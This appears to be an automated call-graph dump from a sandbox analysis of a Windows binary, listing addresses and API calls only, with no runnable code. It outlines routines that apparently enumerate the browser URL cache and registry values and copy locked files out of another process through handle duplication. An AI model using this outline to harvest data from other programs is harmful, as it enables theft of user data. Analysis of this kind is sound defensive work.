38895->38896 38896->38400 38898 40b2cc 27 API calls 38897->38898 38899 44543f 38898->38899 38900 409d1f 6 API calls 38899->38900 38901 44544f 38900->38901 39819 409b98 GetFileAttributesW 38901->39819 38903 44545e 38904 445476 38903->38904 38905 40b6ef 252 API calls 38903->38905 38906 40b2cc 27 API calls 38904->38906 38905->38904 38907 445482 38906->38907 38908 409d1f 6 API calls 38907->38908 38909 445492 38908->38909 39820 409b98 GetFileAttributesW 38909->39820 38911 4454a1 38912 4454b9 38911->38912 38913 40b6ef 252 API calls 38911->38913 38912->38431 38913->38912 38914->38430 38915->38447 38916->38453 38917->38490 38918->38472 38919->38517 38920->38517 38921->38500 38922->38528 38923->38530 38924->38532 38926 414c2e 16 API calls 38925->38926 38927 40c2ae 38926->38927 38997 40c1d3 38927->38997 38932 40c3be 38949 40a8ab 38932->38949 38933 40afcf 2 API calls 38934 40c2fd FindFirstUrlCacheEntryW 38933->38934 38935 40c3b6 38934->38935 38936 40c31e wcschr 38934->38936 38937 40b04b ??3@YAXPAX 38935->38937 38938 40c331 38936->38938 38939 40c35e FindNextUrlCacheEntryW 38936->38939 38937->38932 38940 40a8ab 9 API calls 38938->38940 38939->38936 38941 40c373 GetLastError 38939->38941 38944 40c33e wcschr 38940->38944 38942 40c3ad FindCloseUrlCache 38941->38942 38943 40c37e 38941->38943 38942->38935 38945 40afcf 2 API calls 38943->38945 38944->38939 38946 40c34f 38944->38946 38947 40c391 FindNextUrlCacheEntryW 38945->38947 38948 40a8ab 9 API calls 38946->38948 38947->38936 38947->38942 38948->38939 39113 40a97a 38949->39113 38952 40a8cc 38952->38539 38953 40a8d0 7 API calls 38953->38952 39118 40b1ab free free 38954->39118 38956 40c3dd 38957 40b2cc 27 API calls 38956->38957 38958 40c3e7 38957->38958 39119 414592 RegOpenKeyExW 38958->39119 38960 40c3f4 38961 40c50e 38960->38961 38962 40c3ff 38960->38962 38976 405337 38961->38976 38963 40a9ce 4 API calls 38962->38963 38964 40c418 memset 38963->38964 39120 40aa1d 38964->39120 38967 40c471 38969 40c47a _wcsupr 38967->38969 38968 40c505 RegCloseKey 38968->38961 38970 40a8d0 7 API calls 38969->38970 38971 40c498 38970->38971 38972 40a8d0 7 API calls 38971->38972 38973 40c4ac memset 38972->38973 38974 40aa1d 38973->38974 38975 40c4e4 RegEnumValueW 38974->38975 38975->38968 38975->38969 39122 405220 38976->39122 38980 4099c6 2 API calls 38979->38980 38981 40a714 _wcslwr 38980->38981 38982 40c634 38981->38982 39179 405361 38982->39179 38985 40c65c wcslen 39182 4053b6 39 API calls 38985->39182 38986 40c71d wcslen 38986->38549 38988 40c713 39185 4053df 39 API calls 38988->39185 38989 40c677 38989->38988 39183 40538b 39 API calls 38989->39183 38992 40c6a5 38992->38988 38993 40c6a9 memset 38992->38993 38994 40c6d3 38993->38994 39184 40c589 43 API calls 38994->39184 38996->38546 38998 40ae18 9 API calls 38997->38998 39004 40c210 38998->39004 38999 40ae51 9 API calls 38999->39004 39000 40c264 39001 40aebe FindClose 39000->39001 39003 40c26f 39001->39003 39002 40add4 2 API calls 39002->39004 39009 40e5ed memset memset 39003->39009 39004->38999 39004->39000 39004->39002 39005 40c231 _wcsicmp 39004->39005 39006 40c1d3 35 API calls 39004->39006 39005->39004 39007 40c248 39005->39007 39006->39004 39022 40c084 22 API calls 39007->39022 39010 414c2e 16 API calls 39009->39010 39011 40e63f 39010->39011 39012 409d1f 6 API calls 39011->39012 39013 40e658 39012->39013 39023 409b98 GetFileAttributesW 39013->39023 39015 40e667 39016 40e680 39015->39016 39018 409d1f 6 API calls 39015->39018 39024 409b98 GetFileAttributesW 39016->39024 39018->39016 39019 40e68f 39020 40c2d8 39019->39020 39025 40e4b2 39019->39025 39020->38932 39020->38933 39022->39004 39023->39015 39024->39019 39046 40e01e 39025->39046 39027 40e593 39029 40e5b0 39027->39029 39030 40e59c DeleteFileW 39027->39030 39028 40e521 39028->39027 39069 40e175 39028->39069 39031 40b04b ??3@YAXPAX 39029->39031 39030->39029 39032 40e5bb 39031->39032 39034 40e5c4 CloseHandle 39032->39034 39035 40e5cc 39032->39035 39034->39035 39037 40b633 free 39035->39037 39036 40e573 39038 40e584 39036->39038 39039 40e57c CloseHandle 39036->39039 39040 40e5db 39037->39040 39112 40b1ab free free 39038->39112 39039->39038 39043 40b633 free 39040->39043 39042 40e540 39042->39036 39089 40e2ab 39042->39089 39044 40e5e3 39043->39044 39044->39020 39047 406214 22 API calls 39046->39047 39048 40e03c 39047->39048 39049 40e16b 39048->39049 39050 40dd85 74 API calls 39048->39050 39049->39028 39051 40e06b 39050->39051 39051->39049 39052 40afcf ??2@YAPAXI ??3@YAXPAX 39051->39052 39053 40e08d OpenProcess 39052->39053 39054 40e0a4 GetCurrentProcess DuplicateHandle 39053->39054 39058 40e152 39053->39058 39055 40e0d0 GetFileSize 39054->39055 39056 40e14a CloseHandle 39054->39056 39059 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39055->39059 39056->39058 39057 40e160 39061 40b04b ??3@YAXPAX 39057->39061 39058->39057 39060 406214 22 API calls 39058->39060 39062 40e0ea 39059->39062 39060->39057 39061->39049 39063 4096dc CreateFileW 39062->39063 39064 40e0f1 CreateFileMappingW 39063->39064 39065 40e140 CloseHandle CloseHandle 39064->39065 39066 40e10b MapViewOfFile 39064->39066 39065->39056 39067 40e13b CloseHandle 39066->39067 39068 40e11f WriteFile UnmapViewOfFile 39066->39068 39067->39065 39068->39067 39070 40e18c 39069->39070 39071 406b90 11 API calls 39070->39071 39072 40e19f 39071->39072 39073 40e1a7 memset 39072->39073 39074 40e299 39072->39074 39079 40e1e8 39073->39079 39075 4069a3 ??3@YAXPAX free 39074->39075 39076 40e2a4 39075->39076 39076->39042 39077 406e8f 13 API calls 39077->39079 39078 406b53 SetFilePointerEx ReadFile 39078->39079 39079->39077 39079->39078 39080 40e283 39079->39080 39081 40dd50 _wcsicmp 39079->39081 39085 40742e 8 API calls 39079->39085 39086 40aae3 wcslen wcslen _memicmp 39079->39086 39087 40e244 _snwprintf 39079->39087 39082 40e291 39080->39082 39083 40e288 free 39080->39083 39081->39079 39084 40aa04 free 39082->39084 39083->39082 39084->39074 39085->39079 39086->39079 39088 40a8d0 7 API calls 39087->39088 39088->39079 39090 40e2c2 39089->39090 39091 406b90 11 API calls 39090->39091 39102 40e2d3 39091->39102 39092 40e4a0 39093 4069a3 ??3@YAXPAX free 39092->39093 39095 40e4ab 39093->39095 39094 406e8f 13 API calls 39094->39102 39095->39042 39096 406b53 SetFilePointerEx ReadFile 39096->39102 39097 40e489 39098 40aa04 free 39097->39098 39099 40e491 39098->39099 39099->39092 39100 40e497 free 39099->39100 39100->39092 39101 40dd50 _wcsicmp 39101->39102 39102->39092 39102->39094 39102->39096 39102->39097 39102->39101 39103 40dd50 _wcsicmp 39102->39103 39106 40742e 8 API calls 39102->39106 39107 40e3e0 memcpy 39102->39107 39108 40e3b3 wcschr 39102->39108 39109 40e3fb memcpy 39102->39109 39110 40e416 memcpy 39102->39110 39111 40e431 memcpy 39102->39111 39104 40e376 memset 39103->39104 39105 40aa29 6 API calls 39104->39105 39105->39102 39106->39102 39107->39102 39108->39102 39109->39102 39110->39102 39111->39102 39112->39027 39115 40a980 39113->39115 39114 40a8bb 39114->38952 39114->38953 39115->39114 39116 40a995 _wcsicmp 39115->39116 39117 40a99c wcscmp 39115->39117 39116->39115 39117->39115 39118->38956 39119->38960 39121 40aa23 RegEnumValueW 39120->39121 39121->38967 39121->38968 39123 405335 39122->39123 39124 40522a 39122->39124 39123->38549 39125 40b2cc 27 API calls 39124->39125 39126 405234 39125->39126 39127 40a804 8 API calls 39126->39127 39128 40523a 39127->39128 39167 40b273 39128->39167 39130 405248 _mbscpy _mbscat GetProcAddress 39131 40b273 27 API calls 39130->39131 39132 405279 39131->39132 39170 405211 GetProcAddress 39132->39170 39134 405282 39135 40b273 27 API calls 39134->39135 39136 40528f 39135->39136 39171 405211 GetProcAddress 39136->39171 39138 405298 39139 40b273 27 API calls 39138->39139 39140 4052a5 39139->39140 39172 405211 GetProcAddress 39140->39172 39142 4052ae 39143 40b273 27 API calls 39142->39143 39144 4052bb 39143->39144 39173 405211 GetProcAddress 39144->39173 39146 4052c4 39147 40b273 27 API calls 39146->39147 39148 4052d1 39147->39148 39174 405211 GetProcAddress 39148->39174 39150 4052da 39151 40b273 27 API calls 39150->39151 39152 4052e7 39151->39152 39175 405211 GetProcAddress 39152->39175 39154 4052f0 39155 40b273 27 API calls 39154->39155 39156 4052fd 39155->39156 39176 405211 GetProcAddress 39156->39176 39158 405306 39159 40b273 27 API calls 39158->39159 39160 405313 39159->39160 39177 405211 GetProcAddress 39160->39177 39162 40531c 39163 40b273 27 API calls 39162->39163 39164 405329 39163->39164 39178 405211 GetProcAddress 39164->39178 39166 405332 39166->39123 39168 40b58d 27 API calls 39167->39168 39169 40b18c 39168->39169 39169->39130 39170->39134 39171->39138 39172->39142 39173->39146 39174->39150 39175->39154 39176->39158 39177->39162 39178->39166 39180 405220 39 API calls 39179->39180 39181 405369 39180->39181 39181->38985 39181->38986 39182->38989 39183->38992 39184->38988 39185->38986 39187 40440c FreeLibrary 39186->39187 39188 40436d 39187->39188 39189 40a804 8 API calls 39188->39189 39190 404377 39189->39190 39191 404383 39190->39191 39192 404405 39190->39192 39193 40b273 27 API calls 39191->39193 39192->38558 39192->38560 39192->38561 39194 40438d GetProcAddress 39193->39194 39195 40b273 27 API calls 39194->39195 39196 4043a7 GetProcAddress 39195->39196 39197 40b273 27 API calls 39196->39197 39198 4043ba GetProcAddress 39197->39198 39199 40b273 27 API calls 39198->39199 39200 4043ce GetProcAddress 39199->39200 39201 40b273 27 API calls 39200->39201 39202 4043e2 GetProcAddress 39201->39202 39203 4043f1 39202->39203 39204 4043f7 39203->39204 39205 40440c FreeLibrary 39203->39205 39204->39192 39205->39192 39207 404413 FreeLibrary 39206->39207 39208 40441e 39206->39208 39207->39208 39208->38575 39209->38567 39211 40442e 39210->39211 39212 40447e 39210->39212 39213 40b2cc 27 API calls 39211->39213 39212->38567 39214 404438 39213->39214 39215 40a804 8 API calls 39214->39215 39216 40443e 39215->39216 39217 404445 39216->39217 39218 404467 39216->39218 39219 40b273 27 API calls 39217->39219 39218->39212 39220 404475 FreeLibrary 39218->39220 39221 40444f GetProcAddress 39219->39221 39220->39212 39221->39218 39222 404460 39221->39222 39222->39218 39224 4135f6 39223->39224 39225 4135eb FreeLibrary 39223->39225 39224->38578 39225->39224 39227 4449c4 39226->39227 39228 444a52 39226->39228 39229 40b2cc 27 API calls 39227->39229 39228->38595 39228->38596 39230 4449cb 39229->39230 39231 40a804 8 API calls 39230->39231 39232 4449d1 39231->39232 39233 40b273 27 API calls 39232->39233 39234 4449dc GetProcAddress 39233->39234 39235 40b273 27 API calls 39234->39235 39236 4449f3 GetProcAddress 39235->39236 39237 40b273 27 API calls 39236->39237 39238 444a04 GetProcAddress 39237->39238 39239 40b273 27 API calls 39238->39239 39240 444a15 GetProcAddress 39239->39240 39241 40b273 27 API calls 39240->39241 39242 444a26 GetProcAddress 39241->39242 39243 40b273 27 API calls 39242->39243 39244 444a37 GetProcAddress 39243->39244 39245 40b273 27 API calls 39244->39245 39246 444a48 GetProcAddress 39245->39246 39246->39228 39247->38606 39248->38606 39249->38606 39250->38606 39251->38597 39253 403a29 39252->39253 39267 403bed memset memset 39253->39267 39255 403ae7 39280 40b1ab free free 39255->39280 39256 403a3f memset 39262 403a2f 39256->39262 39258 403aef 39258->38613 39259 409b98 GetFileAttributesW 39259->39262 39260 40a8d0 7 API calls 39260->39262 39261 409d1f 6 API calls 39261->39262 39262->39255 39262->39256 39262->39259 39262->39260 39262->39261 39264 40a051 GetFileTime CloseHandle 39263->39264 39265 4039ca CompareFileTime 39263->39265 39264->39265 39265->38613 39266->38614 39268 414c2e 16 API calls 39267->39268 39269 403c38 39268->39269 39270 409719 2 API calls 39269->39270 39271 403c3f wcscat 39270->39271 39272 414c2e 16 API calls 39271->39272 39273 403c61 39272->39273 39274 409719 2 API calls 39273->39274 39275 403c68 wcscat 39274->39275 39281 403af5 39275->39281 39278 403af5 20 API calls 39279 403c95 39278->39279 39279->39262 39280->39258 39282 403b02 39281->39282 39283 40ae18 9 API calls 39282->39283 39291 403b37 39283->39291 39284 403bdb 39286 40aebe FindClose 39284->39286 39285 40add4 wcscmp wcscmp 39285->39291 39287 403be6 39286->39287 39287->39278 39288 40ae18 9 API calls 39288->39291 39289 40ae51 9 API calls 39289->39291 39290 40aebe FindClose 39290->39291 39291->39284 39291->39285 39291->39288 39291->39289 39291->39290 39292 40a8d0 7 API calls 39291->39292 39292->39291 39294 409d1f 6 API calls 39293->39294 39295 404190 39294->39295 39308 409b98 GetFileAttributesW 39295->39308 39297 40419c 39298 4041a7 6 API calls 39297->39298 39299 40435c 39297->39299 39301 40424f 39298->39301 39299->38640 39301->39299 39302 40425e memset 39301->39302 39304 409d1f 6 API calls 39301->39304 39305 40a8ab 9 API calls 39301->39305 39309 414842 39301->39309 39302->39301 39303 404296 wcscpy 39302->39303 39303->39301 39304->39301 39306 4042b6 memset memset _snwprintf wcscpy 39305->39306 39306->39301 39307->38638 39308->39297 39312 41443e 39309->39312 39311 414866 39311->39301 39313 41444b 39312->39313 39314 414451 39313->39314 39315 4144a3 GetPrivateProfileStringW 39313->39315 39316 414491 39314->39316 39317 414455 wcschr 39314->39317 39315->39311 39318 414495 WritePrivateProfileStringW 39316->39318 39317->39316 39319 414463 _snwprintf 39317->39319 39318->39311 39319->39318 39320->38644 39322 40b2cc 27 API calls 39321->39322 39323 409615 39322->39323 39324 409d1f 6 API calls 39323->39324 39325 409625 39324->39325 39350 409b98 GetFileAttributesW 39325->39350 39327 409634 39328 409648 39327->39328 39351 4091b8 memset 39327->39351 39330 40b2cc 27 API calls 39328->39330 39332 408801 39328->39332 39331 40965d 39330->39331 39333 409d1f 6 API calls 39331->39333 39332->38647 39332->38648 39334 40966d 39333->39334 39403 409b98 GetFileAttributesW 39334->39403 39336 40967c 39336->39332 39337 409681 39336->39337 39404 409529 72 API calls 39337->39404 39339 409690 39339->39332 39340->38670 39341->38647 39350->39327 39405 40a6e6 WideCharToMultiByte 39351->39405 39353 409202 39406 444432 39353->39406 39356 40b273 27 API calls 39357 409236 39356->39357 39452 438552 39357->39452 39360 409383 39362 40b273 27 API calls 39360->39362 39364 409399 39362->39364 39366 438552 134 API calls 39364->39366 39384 4093a3 39366->39384 39370 4094ff 39481 443d90 39370->39481 39373 4251c4 137 API calls 39373->39384 39375 409507 39383 40951d 39375->39383 39377 4093df 39480 424f26 123 API calls 39377->39480 39381 4253cf 17 API calls 39381->39384 39383->39328 39384->39370 39384->39373 39384->39377 39384->39381 39386 4093e4 39384->39386 39478 4253af 17 API calls 39386->39478 39393 4093ed 39479 4253af 17 API calls 39393->39479 39403->39336 39404->39339 39405->39353 39502 4438b5 39406->39502 39408 44444c 39414 409215 39408->39414 39516 415a6d 39408->39516 39410 4442e6 11 API calls 39412 44469e 39410->39412 39411 444486 39413 4444b9 memcpy 39411->39413 39451 4444a4 39411->39451 39412->39414 39416 443d90 111 API calls 39412->39416 39520 415258 39413->39520 39414->39356 39414->39383 39416->39414 39417 444524 39418 444541 39417->39418 39419 44452a 39417->39419 39523 444316 39418->39523 39420 416935 16 API calls 39419->39420 39420->39451 39423 444316 18 API calls 39424 444563 39423->39424 39425 444316 18 API calls 39424->39425 39426 44456f 39425->39426 39427 444316 18 API calls 39426->39427 39451->39410 39590 438460 39452->39590 39454 409240 39454->39360 39455 4251c4 39454->39455 39602 424f07 39455->39602 39457 4251e4 39458 4251f7 39457->39458 39459 4251e8 39457->39459 39610 4250f8 39458->39610 39609 4446ea 11 API calls 39459->39609 39461 4251f2 39478->39393 39480->39370 39482 443da3 39481->39482 39483 443db6 39481->39483 39626 41707a 11 API calls 39482->39626 39483->39375 39503 4438d0 39502->39503 39514 4438c9 39502->39514 39504 415378 memcpy memcpy 39503->39504 39505 4438d5 39504->39505 39506 4154e2 10 API calls 39505->39506 39507 443906 39505->39507 39505->39514 39506->39507 39508 443970 memset 39507->39508 39507->39514 39510 44398b 39508->39510 39509 4439a0 39511 415700 10 API calls 39509->39511 39509->39514 39510->39509 39513 41975c 10 API calls 39510->39513 39512 4439c0 39511->39512 39512->39514 39515 418981 10 API calls 39512->39515 39513->39509 39514->39408 39515->39514 39517 415a77 39516->39517 39518 415a8d 39517->39518 39519 415a7e memset 39517->39519 39518->39411 39519->39518 39521 4438b5 11 API calls 39520->39521 39522 41525d 39521->39522 39522->39417 39524 444328 39523->39524 39525 444423 39524->39525 39526 44434e 39524->39526 39527 4446ea 11 API calls 39525->39527 39528 432d4e memset memset memcpy 39526->39528 39534 444381 39527->39534 39529 44435a 39528->39529 39531 444375 39529->39531 39536 44438b 39529->39536 39530 432d4e memset memset memcpy 39532 4443ec 39530->39532 39533 416935 16 API calls 39531->39533 39532->39534 39535 416935 16 API calls 39532->39535 39533->39534 39534->39423 39535->39534 39536->39530 39591 41703f 11 API calls 39590->39591 39592 43847a 39591->39592 39593 43848a 39592->39593 39594 43847e 39592->39594 39596 438270 134 API calls 39593->39596 39595 4446ea 11 API calls 39594->39595 39598 438488 39595->39598 39597 4384aa 39596->39597 39597->39598 39599 424f26 123 API calls 39597->39599 39598->39454 39600 4384bb 39599->39600 39601 438270 134 API calls 39600->39601 39601->39598 39603 424f1f 39602->39603 39604 424f0c 39602->39604 39606 424eea 11 API calls 39603->39606 39605 416760 11 API calls 39604->39605 39607 424f18 39605->39607 39608 424f24 39606->39608 39607->39457 39608->39457 39609->39461 39611 425108 39610->39611 39617 42510d 39610->39617 39613 42569b 125 API calls 39617->39613 39659 413f4f 39632->39659 39635 413f37 K32GetModuleFileNameExW 39636 413f4a 39635->39636 39636->38706 39638 413969 wcscpy 39637->39638 39639 41396c wcschr 39637->39639 39651 413a3a 39638->39651 39639->39638 39641 41398e 39639->39641 39664 4097f7 wcslen wcslen _memicmp 39641->39664 39643 41399a 39644 4139a4 memset 39643->39644 39645 4139e6 39643->39645 39665 409dd5 GetWindowsDirectoryW wcscpy 39644->39665 39647 413a31 wcscpy 39645->39647 39648 4139ec memset 39645->39648 39647->39651 39666 409dd5 GetWindowsDirectoryW wcscpy 39648->39666 39649 4139c9 wcscpy wcscat 39649->39651 39651->38706 39652 413a11 memcpy wcscat 39652->39651 39654 413cb0 GetModuleHandleW 39653->39654 39655 413cda 39653->39655 39654->39655 39656 413cbf GetProcAddress 39654->39656 39657 413ce3 GetProcessTimes 39655->39657 39658 413cf6 39655->39658 39656->39655 39657->38709 39658->38709 39660 413f2f 39659->39660 39661 413f54 39659->39661 39660->39635 39660->39636 39662 40a804 8 API calls 39661->39662 39663 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39662->39663 39663->39660 39664->39643 39665->39649 39666->39652 39667->38730 39668->38753 39670 409cf9 GetVersionExW 39669->39670 39671 409d0a 39669->39671 39670->39671 39671->38759 39671->38764 39672->38765 39673->38768 39674->38770 39675->38836 39677 40bba5 39676->39677 39724 40cc26 39677->39724 39680 40bd4b 39752 40cc0c 39680->39752 39685 40b2cc 27 API calls 39686 40bbef 39685->39686 39745 40ccf0 39686->39745 39688 40bbf5 39688->39680 39749 40ccb4 39688->39749 39691 40cf04 17 API calls 39692 40bc2e 39691->39692 39693 40bd43 39692->39693 39694 40b2cc 27 API calls 39692->39694 39695 40cc0c 4 API calls 39693->39695 39696 40bc40 39694->39696 39695->39680 39697 40ccf0 _wcsicmp 39696->39697 39698 40bc46 39697->39698 39698->39693 39699 40bc61 memset memset WideCharToMultiByte 39698->39699 39759 40103c strlen 39699->39759 39701 40bcc0 39702 40b273 27 API calls 39701->39702 39703 40bcd0 memcmp 39702->39703 39703->39693 39704 40bce2 39703->39704 39705 404423 37 API calls 39704->39705 39706 40bd10 39705->39706 39706->39693 39707 40bd3a LocalFree 39706->39707 39708 40bd1f memcpy 39706->39708 39707->39693 39708->39707 39709->38851 39711 409a74 GetTempFileNameW 39710->39711 39712 409a66 GetWindowsDirectoryW 39710->39712 39711->38850 39712->39711 39713->38888 39714->38888 39715->38888 39716->38888 39717->38888 39718->38888 39719->38888 39720->38888 39721->38888 39722->38863 39723->38885 39760 4096c3 CreateFileW 39724->39760 39726 40cc34 39727 40cc3d GetFileSize 39726->39727 39735 40bbca 39726->39735 39728 40afcf 2 API calls 39727->39728 39729 40cc64 39728->39729 39761 40a2ef ReadFile 39729->39761 39731 40cc71 39762 40ab4a MultiByteToWideChar 39731->39762 39733 40cc95 CloseHandle 39734 40b04b ??3@YAXPAX 39733->39734 39734->39735 39735->39680 39736 40cf04 39735->39736 39737 40b633 free 39736->39737 39738 40cf14 39737->39738 39768 40b1ab free free 39738->39768 39740 40bbdd 39740->39680 39740->39685 39741 40cf1b 39741->39740 39743 40cfef 39741->39743 39769 40cd4b 39741->39769 39744 40cd4b 14 API calls 39743->39744 39744->39740 39746 40ccfd 39745->39746 39748 40cd3f 39745->39748 39747 40cd26 _wcsicmp 39746->39747 39746->39748 39747->39746 39747->39748 39748->39688 39750 40aa29 6 API calls 39749->39750 39751 40bc26 39750->39751 39751->39691 39753 40b633 free 39752->39753 39754 40cc15 39753->39754 39755 40aa04 free 39754->39755 39756 40cc1d 39755->39756 39818 40b1ab free free 39756->39818 39758 40b7d4 memset CreateFileW 39758->38843 39758->38844 39759->39701 39760->39726 39761->39731 39763 40ab93 39762->39763 39764 40ab6b 39762->39764 39763->39733 39765 40a9ce 4 API calls 39764->39765 39766 40ab74 39765->39766 39767 40ab7c MultiByteToWideChar 39766->39767 39767->39763 39768->39741 39770 40cd7b 39769->39770 39803 40aa29 39770->39803 39772 40cef5 39773 40aa04 free 39772->39773 39774 40cefd 39773->39774 39774->39741 39776 40aa29 6 API calls 39777 40ce1d 39776->39777 39778 40aa29 6 API calls 39777->39778 39779 40ce3e 39778->39779 39780 40ce6a 39779->39780 39811 40abb7 wcslen memmove 39779->39811 39781 40ce9f 39780->39781 39814 40abb7 wcslen memmove 39780->39814 39783 40a8d0 7 API calls 39781->39783 39786 40ceb5 39783->39786 39784 40ce56 39812 40aa71 wcslen 39784->39812 39792 40a8d0 7 API calls 39786->39792 39788 40ce8b 39815 40aa71 wcslen 39788->39815 39789 40ce5e 39813 40abb7 wcslen memmove 39789->39813 39795 40cecb 39792->39795 39793 40ce93 39816 40abb7 wcslen memmove 39793->39816 39817 40d00b malloc memcpy free free 39795->39817 39797 40cedd 39798 40aa04 free 39797->39798 39799 40cee5 39798->39799 39800 40aa04 free 39799->39800 39801 40ceed 39800->39801 39802 40aa04 free 39801->39802 39802->39772 39804 40aa33 39803->39804 39805 40aa63 39803->39805 39806 40aa44 39804->39806 39807 40aa38 wcslen 39804->39807 39805->39772 39805->39776 39808 40a9ce malloc memcpy free free 39806->39808 39807->39806 39809 40aa4d 39808->39809 39809->39805 39810 40aa51 memcpy 39809->39810 39810->39805 39811->39784 39812->39789 39813->39780 39814->39788 39815->39793 39816->39781 39817->39797 39818->39758 39819->38903 39820->38911 39830 44def7 39831 44df07 39830->39831 39832 44df00 ??3@YAXPAX 39830->39832 39833 44df17 39831->39833 39834 44df10 ??3@YAXPAX 39831->39834 39832->39831 39835 44df27 39833->39835 39836 44df20 ??3@YAXPAX 39833->39836 39834->39833 39837 44df37 39835->39837 39838 44df30 ??3@YAXPAX 39835->39838 39836->39835 39838->39837 37667 44dea5 37668 44deb5 FreeLibrary 37667->37668 37669 44dec3 37667->37669 37668->37669 39839 4148b6 FindResourceW 39840 4148cf SizeofResource 39839->39840 39843 4148f9 39839->39843 39841 4148e0 LoadResource 39840->39841 39840->39843 39842 4148ee LockResource 39841->39842 39841->39843 39842->39843 37848 415304 free 37670 415320 realloc 37671 415340 37670->37671 37672 41534d 37670->37672 37674 416760 11 API calls 37672->37674 37674->37671 39844 441b3f 39854 43a9f6 39844->39854 39846 441b61 40027 4386af memset 39846->40027 39848 44189a 39849 4418e2 39848->39849 39853 442bd4 39848->39853 39850 4418ea 39849->39850 40028 4414a9 12 API calls 39849->40028 39853->39850 40029 441409 memset 39853->40029 39855 43aa20 39854->39855 39856 43aadf 39854->39856 39855->39856 39857 43aa34 memset 39855->39857 39856->39846 39858 43aa56 39857->39858 39859 43aa4d 39857->39859 40030 43a6e7 39858->40030 40038 42c02e memset 39859->40038 39864 43aad3 40040 4169a7 11 API calls 39864->40040 39865 43aaae 39865->39856 39865->39864 39880 43aae5 39865->39880 39866 43ac18 39869 43ac47 39866->39869 40042 42bbd5 memcpy memcpy memcpy memset memcpy 39866->40042 39870 43aca8 39869->39870 40043 438eed 16 API calls 39869->40043 39873 43acd5 39870->39873 40045 4233ae 11 API calls 39870->40045 40046 423426 11 API calls 39873->40046 39874 43ac87 40044 4233c5 16 API calls 39874->40044 39878 43ace1 40047 439811 163 API calls 39878->40047 39879 43a9f6 161 API calls 39879->39880 39880->39856 39880->39866 39880->39879 40041 439bbb 22 API calls 39880->40041 39882 43acfd 39888 43ad2c 39882->39888 40048 438eed 16 API calls 39882->40048 39884 43ad19 40049 4233c5 16 API calls 39884->40049 39885 43ad58 40050 44081d 163 API calls 39885->40050 39888->39885 39891 43add9 39888->39891 39890 43ae3a memset 39892 43ae73 39890->39892 39891->39891 40054 423426 11 API calls 39891->40054 40055 42e1c0 147 API calls 39892->40055 39893 43adab 40052 438c4e 163 API calls 39893->40052 39896 43ad6c 39896->39856 39896->39893 40051 42370b memset memcpy memset 39896->40051 39897 43adcc 40053 440f84 12 API calls 39897->40053 39898 43ae96 40056 42e1c0 147 API calls 39898->40056 39902 43aea8 39903 43aec1 39902->39903 40057 42e199 147 API calls 39902->40057 39904 43af00 39903->39904 40058 42e1c0 147 API calls 39903->40058 39904->39856 39908 43af1a 39904->39908 39909 43b3d9 39904->39909 40059 438eed 16 API calls 39908->40059 39914 43b3f6 39909->39914 39918 43b4c8 39909->39918 39911 43b60f 39911->39856 40118 4393a5 17 API calls 39911->40118 39912 43af2f 40060 4233c5 16 API calls 39912->40060 40100 432878 12 API calls 39914->40100 39916 43af51 40061 423426 11 API calls 39916->40061 39924 43b4f2 39918->39924 40106 42bbd5 memcpy memcpy memcpy memset memcpy 39918->40106 39920 43af7d 40062 423426 11 API calls 39920->40062 40107 43a76c 21 API calls 39924->40107 39925 43b529 40108 44081d 163 API calls 39925->40108 39926 43b462 40102 423330 11 API calls 39926->40102 39927 43af94 40063 423330 11 API calls 39927->40063 39931 43b47e 39936 43b497 39931->39936 40103 42374a memcpy memset memcpy memcpy memcpy 39931->40103 39932 43b544 39937 43b55c 39932->39937 40109 42c02e memset 39932->40109 39933 43b428 39933->39926 40101 432b60 16 API calls 39933->40101 39934 43afca 40064 423330 11 API calls 39934->40064 40104 4233ae 11 API calls 39936->40104 40110 43a87a 163 API calls 39937->40110 39938 43afdb 40065 4233ae 11 API calls 39938->40065 39944 43b56c 39947 43b58a 39944->39947 40111 423330 11 API calls 39944->40111 39945 43b4b1 40105 423399 11 API calls 39945->40105 39946 43afee 40066 44081d 163 API calls 39946->40066 40112 440f84 12 API calls 39947->40112 39952 43b4c1 40114 42db80 163 API calls 39952->40114 39954 43b592 40113 43a82f 16 API calls 39954->40113 39957 43b5b4 40115 438c4e 163 API calls 39957->40115 39959 43b5cf 40116 42c02e memset 39959->40116 39961 43b005 39961->39856 39965 43b01f 39961->39965 40067 42d836 163 API calls 39961->40067 39962 43b1ef 40077 4233c5 16 API calls 39962->40077 39965->39962 40075 423330 11 API calls 39965->40075 40076 42d71d 163 API calls 39965->40076 39966 43b212 40078 423330 11 API calls 39966->40078 39967 43b087 40068 4233ae 11 API calls 39967->40068 39968 43add4 39968->39911 40117 438f86 16 API calls 39968->40117 39973 43b22a 40079 42ccb5 11 API calls 39973->40079 39975 43b23f 40080 4233ae 11 API calls 39975->40080 39976 43b10f 40071 423330 11 API calls 39976->40071 39978 43b257 40081 4233ae 11 API calls 39978->40081 39982 43b129 40072 4233ae 11 API calls 39982->40072 39983 43b26e 40082 4233ae 11 API calls 39983->40082 39986 43b09a 39986->39976 40069 42cc15 19 API calls 39986->40069 40070 4233ae 11 API calls 39986->40070 39987 43b282 40083 43a87a 163 API calls 39987->40083 39989 43b13c 40073 440f84 12 API calls 39989->40073 39991 43b29d 40084 423330 11 API calls 39991->40084 39994 43b15f 40074 4233ae 11 API calls 39994->40074 39995 43b2af 39997 43b2b8 39995->39997 39998 43b2ce 39995->39998 40085 4233ae 11 API calls 39997->40085 40086 440f84 12 API calls 39998->40086 40001 43b2c9 40088 4233ae 11 API calls 40001->40088 40002 43b2da 40087 42370b memset memcpy memset 40002->40087 40005 43b2f9 40089 423330 11 API calls 40005->40089 40007 43b30b 40090 423330 11 API calls 40007->40090 40009 43b325 40091 423399 11 API calls 40009->40091 40011 43b332 40092 4233ae 11 API calls 40011->40092 40013 43b354 40093 423399 11 API calls 40013->40093 40015 43b364 40094 43a82f 16 API calls 40015->40094 40017 43b370 40095 42db80 163 API calls 40017->40095 40019 43b380 40096 438c4e 163 API calls 40019->40096 40021 43b39e 40097 423399 11 API calls 40021->40097 40023 43b3ae 40098 43a76c 21 API calls 40023->40098 40025 43b3c3 40099 423399 11 API calls 40025->40099 40027->39848 40028->39850 40029->39853 40031 43a6f5 40030->40031 40032 43a765 40030->40032 40031->40032 40119 42a115 40031->40119 40032->39856 40039 4397fd memset 40032->40039 40036 43a73d 40036->40032 40037 42a115 147 API calls 40036->40037 40037->40032 40038->39858 40039->39865 40040->39856 40041->39880 40042->39869 40043->39874 40044->39870 40045->39873 40046->39878 40047->39882 40048->39884 40049->39888 40050->39896 40051->39893 40052->39897 